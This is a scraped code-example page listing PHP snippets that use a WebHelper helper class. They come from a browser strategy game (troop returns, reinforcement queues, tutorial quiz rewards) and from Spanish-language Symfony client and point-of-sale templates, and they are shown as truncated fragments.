                         $newTask = new QueueTask(QS_WAR_REINFORCE, intval($fromVillageData['player_id']), $timeInSeconds);
                         $newTask->villageId = $fromVillageId;
                         $newTask->toPlayerId = intval($toVillageData['player_id']);
                         $newTask->toVillageId = $toVillageId;
                         $newTask->procParams = $procParams;
                         $newTask->tag = array("troops" => NULL, "hasHero" => FALSE, "resources" => NULL);
                         $affectCropConsumption = TRUE;
                         if ($fromVillageData['is_oasis'] && trim($toVillageData['village_oases_id']) != "") {
                             $oArr = explode(",", trim($toVillageData['village_oases_id']));
                             foreach ($oArr as $oid) {
                                 if (!($oid == $fromVillageData['id'])) {
                                 $affectCropConsumption = FALSE;
                         if ($affectCropConsumption) {
                             $newTask->tag['troopsCropConsume'] = $this->_getTroopCropConsumption($sendTroopsArray);
             } else {
                 $this->backTroopsProperty['time'] = intval($distance / $this->_getTheSlowestTroopSpeed2($this->backTroopsProperty['backTroops']) * 3600);
Пример #14

        WebHelper::linkButton(array('target' => url_for('cliente/delete?id=' . $cliente->getId()), 'confirmMessage' => '¿Está seguro de eliminar este Cliente?', 'linkClass' => 'btnX'));
} else {
  <p>No existe informaci&oacute;n de Clientes</p>

<div class="smallMargins">
WebHelper::linkButton(array('text' => 'Nuevo Cliente', 'target' => url_for('cliente/new'), 'linkClass' => 'btnAdd'));
Пример #15
 function getBaseUrl()
     return (WebHelper::isssl() ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . strrev(strstr(strrev($_SERVER['PHP_SELF']), '/'));
Пример #16

        WebHelper::linkButton(array('target' => url_for('puntoVenta/delete?id=' . $punto_venta->getId()), 'confirmMessage' => '¿Está seguro de eliminar este Punto de Venta?', 'linkClass' => 'btnX'));

} else {
  <p>No se han definido Puntos de Venta</p>

<div class="smallMargins">
WebHelper::linkButton(array('text' => 'Nuevo Punto de Venta', 'target' => url_for('puntoVenta/new'), 'linkClass' => 'btnAdd'));
Пример #17
 function handleTroopBack()
     $qstr = '';
     $fromVillageId = 0;
     $toVillageId = 0;
     $action = 0;
     if (isset($_GET['d1'])) {
         $action = 1;
         $qstr = 'd1=' . intval($_GET['d1']);
         if (isset($_GET['o'])) {
             $qstr .= '&o=' . intval($_GET['o']);
             $fromVillageId = intval($_GET['o']);
         } else {
             $fromVillageId = $this->data['selected_village_id'];
         $toVillageId = intval($_GET['d1']);
     } else {
         if (isset($_GET['d2'])) {
             $action = 2;
             $qstr = 'd2=' . intval($_GET['d2']);
             $fromVillageId = $this->data['selected_village_id'];
             $toVillageId = intval($_GET['d2']);
         } else {
             if (isset($_GET['d3'])) {
                 $action = 3;
                 $qstr = 'd3=' . intval($_GET['d3']);
                 $fromVillageId = intval($_GET['d3']);
                 $toVillageId = $this->data['selected_village_id'];
             } else {
                 //return null;
     $this->backTroopsProperty['queryString'] = $qstr;
     $m = new WarModel();
     $fromVillageData = $m->getVillageData2ById($fromVillageId);
     $toVillageData = $m->getVillageData2ById($toVillageId);
     if ($fromVillageData == NULL or $toVillageData == NULL) {
         //return null;
     $vid = $toVillageId;
     $_backTroopsStr = '';
     $this->backTroopsProperty['headerText'] = v2v_p_backtroops;
     $this->backTroopsProperty['action1'] = '<a href="village3.php?id=' . $fromVillageData['id'] . '">' . $fromVillageData['village_name'] . '</a>';
     $this->backTroopsProperty['action2'] = '<a href="profile.php?uid=' . $fromVillageData['player_id'] . '">' . v2v_p_troopsinvillagenow . '</a>';
     $column1 = '';
     $column2 = '';
     if ($action == 1) {
         $_backTroopsStr = $fromVillageData['troops_num'];
         $column1 = 'troops_num';
         $column2 = 'troops_out_num';
     } else {
         if ($action == 2) {
             $this->backTroopsProperty['headerText'] = v2v_p_backcaptivitytroops;
             $_backTroopsStr = $fromVillageData['troops_intrap_num'];
             $column1 = 'troops_intrap_num';
             $column2 = 'troops_out_intrap_num';
         } else {
             if ($action == 3) {
                 $_backTroopsStr = $toVillageData['troops_out_num'];
                 $vid = $fromVillageId;
                 $column1 = 'troops_num';
                 $column2 = 'troops_out_num';
     $this->backTroopsProperty['backTroops'] = $this->_getTroopsForVillage($_backTroopsStr, $vid);
     if ($this->backTroopsProperty['backTroops'] == NULL) {
         //return null;
     $distance = WebHelper::getdistance($fromVillageData['rel_x'], $fromVillageData['rel_y'], $toVillageData['rel_x'], $toVillageData['rel_y'], $this->setupMetadata['map_size'] / 2);
     if ($this->isPost()) {
         $canSend = FALSE;
         $troopsGoBack = array();
         foreach ($this->backTroopsProperty['backTroops']['troops'] as $tid => $tnum) {
             if (isset($_POST['t']) and isset($_POST['t'][$tid])) {
                 $selNum = intval($_POST['t'][$tid]);
                 if ($selNum < 0) {
                     $selNum = 0;
                 if ($tnum < $selNum) {
                     $selNum = $tnum;
                 $troopsGoBack[$tid] = $selNum;
                 if (0 < $selNum) {
                     $canSend = TRUE;
             } else {
                 $troopsGoBack[$tid] = 0;
         $sendTroopsArray = array('troops' => $troopsGoBack, 'hasHero' => FALSE, 'heroTroopId' => 0);
         $hasHeroTroop = ($this->backTroopsProperty['backTroops']['hasHero'] and isset($_POST['_t']) and intval($_POST['_t']) == 1);
         if ($hasHeroTroop) {
             $sendTroopsArray['hasHero'] = TRUE;
             $sendTroopsArray['heroTroopId'] = $this->backTroopsProperty['backTroops']['heroTroopId'];
             $canSend = TRUE;
         if (!$canSend) {
             //return null;
         if (!$this->isGameTransientStopped() and !$this->isGameOver()) {
             $troops1 = $this->_getTroopsAfterReduction($fromVillageData[$column1], $toVillageId, $sendTroopsArray);
             $troops2 = $this->_getTroopsAfterReduction($toVillageData[$column2], $fromVillageId, $sendTroopsArray);
             $m->backTroopsFrom($fromVillageId, $column1, $troops1, $toVillageId, $column2, $troops2);
             $timeInSeconds = intval($distance / $this->_getTheSlowestTroopSpeed2($sendTroopsArray) * 3600);
             $procParams = $this->_getTroopAsString($sendTroopsArray) . '|0||||||1';
             $newTask = new QueueTask(QS_WAR_REINFORCE, intval($fromVillageData['player_id']), $timeInSeconds);
             $newTask->villageId = $fromVillageId;
             $newTask->toPlayerId = intval($toVillageData['player_id']);
             $newTask->toVillageId = $toVillageId;
             $newTask->procParams = $procParams;
             $newTask->tag = array('troops' => NULL, 'hasHero' => FALSE, 'resources' => NULL, 'troopsCropConsume' => $this->_getTroopCropConsumption($sendTroopsArray));
             //return null;
     } else {
         $this->backTroopsProperty['time'] = intval($distance / $this->_getTheSlowestTroopSpeed2($this->backTroopsProperty['backTroops']) * 3600);
Пример #18
<input type="hidden" name="sf_method" value="put" />
        <td colspan="2">
	  <div style="float:left" class="smallMargins">
WebHelper::linkButton(array('linkClass' => 'btnBack', 'text' => 'Cancelar', 'target' => url_for('cliente/show/?id=' . $cliente->getId())));

	  <div style="float:left" class="smallMargins">&nbsp;</div>
	  <div  class="smallMargins">
WebHelper::linkButton(array('linkClass' => 'btnOk', 'text' => 'Confirmar', 'target' => "#", 'clickAction' => 'document.contactoForm.submit()'));
echo $form;
Пример #19
 function handleNoQuiz($m, $quizStep)
     $time = floor(36000 / $this->gameMetadata['game_speed']);
     $this->guideData['quiztime'] = WebHelper::secondstostring($time);
     $result = 0;
     switch ($quizStep) {
         case 0:
             if (isset($_GET['v']) && trim($_GET['v']) == 'y') {
                 $result = 1;
                 $newTask = new QueueTask(QS_PLUS1, $this->player->playerId, 86400);
                 $newTask->villageId = '';
                 $newTask->tag = 0;
                 $m->increaseGoldNumber($this->player->playerId, 15);
                 $newTask = new QueueTask(QS_GUIDENOQUIZ, $this->player->playerId, $time);
         case 1:
         case 2:
         case 3:
         case 4:
         case 5:
             if (!isset($this->queueModel->tasksInQueue[QS_GUIDENOQUIZ]) && isset($_GET['v']) && trim($_GET['v']) == 'y') {
                 $result = 1;
                 $m->addResourcesTo($this->data['selected_village_id'], array(217, 247, 177, 207));
                 $newTask = new QueueTask(QS_GUIDENOQUIZ, $this->player->playerId, $time);
         case 6:
             if (!isset($this->queueModel->tasksInQueue[QS_GUIDENOQUIZ]) && isset($_GET['v']) && trim($_GET['v']) == 'y') {
                 $this->clientAction = 100;
                 $this->quiz = GUIDE_QUIZ_COMPLETED;
                 $m->setGuideTask($this->player->playerId, $this->quiz);
                 $newTask = new QueueTask(QS_PLUS1, $this->player->playerId, 172800);
                 $newTask->villageId = '';
                 $newTask->tag = 0;
                 $m->increaseGoldNumber($this->player->playerId, 20);
     if ($result == 1 && $quizStep < 6) {
         $this->quiz = '0,201,' . $quizStep;
         $m->setGuideTask($this->player->playerId, $this->quiz);
     $this->guideData['quizStep'] = $quizStep;
     $this->guideData['pended'] = isset($this->queueModel->tasksInQueue[QS_GUIDENOQUIZ]);
     if ($this->guideData['pended']) {
         $this->guideData['remainingSeconds'] = $this->queueModel->tasksInQueue[QS_GUIDENOQUIZ][0]['remainingSeconds'];
Пример #20
 function getKey()
     return md5(WebHelper::getdomain());